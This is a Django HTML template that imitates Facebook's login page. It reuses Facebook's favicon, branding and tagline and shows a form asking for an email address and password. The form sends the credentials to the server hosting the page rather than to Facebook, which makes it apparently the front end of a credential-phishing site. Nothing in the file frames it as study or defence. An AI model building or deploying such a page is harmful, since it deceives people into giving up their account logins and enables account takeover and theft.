{% load static %}

<html>
    <head>
        <title>Facebook Login Request</title>
        <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico" type="image/png">
        <link href="{% static 'css/fb.css'%}" type="text/css" rel="stylesheet"/>
        <link href="https://fonts.googleapis.com/css?family=Catamaran:700,800&display=swap" rel="stylesheet">
    </head>
    <body>

        <div class="main-header">
            <div class="header">
                <li class="sitename"><a href="https://www.facebook.com/">facebook</a></li>
            </div>
        </div>

        <div class="content">
            <div class="div-1">
                <p>Facebook helps you connect and share with the<br>people in your life.</p>
                <img src="{% static 'img/7XdR1KwCifL.png'%}" class="fb-img">
            </div>

            <div class="div-2">
                <h1>Login</h1>
                <p>It's free and always will be.</p>
                <form method="post">
                    {% csrf_token %}
                <li><input type="email" name="email" placeholder="email address" required></li>
                <li><input type="password" name="password" placeholder="password" required></li>
                <li>
                </li><br><br>
                <li class="terms">By clicking Login In, you agree to our <a href="#">Terms</a>, <a href="#">Data Policy</a> and <br> <a href="#">Cookie Policy</a>. You may receive SMS notifications from us and <br> can opt out at any time.</li>
                <li><input type="submit" value="Log In"></li>
                </form>
                <li class="create_page"><a href="#">Create a Page</a> for a celebrity, band or business.</li>
            </div>
        </div>
    </body>
</html>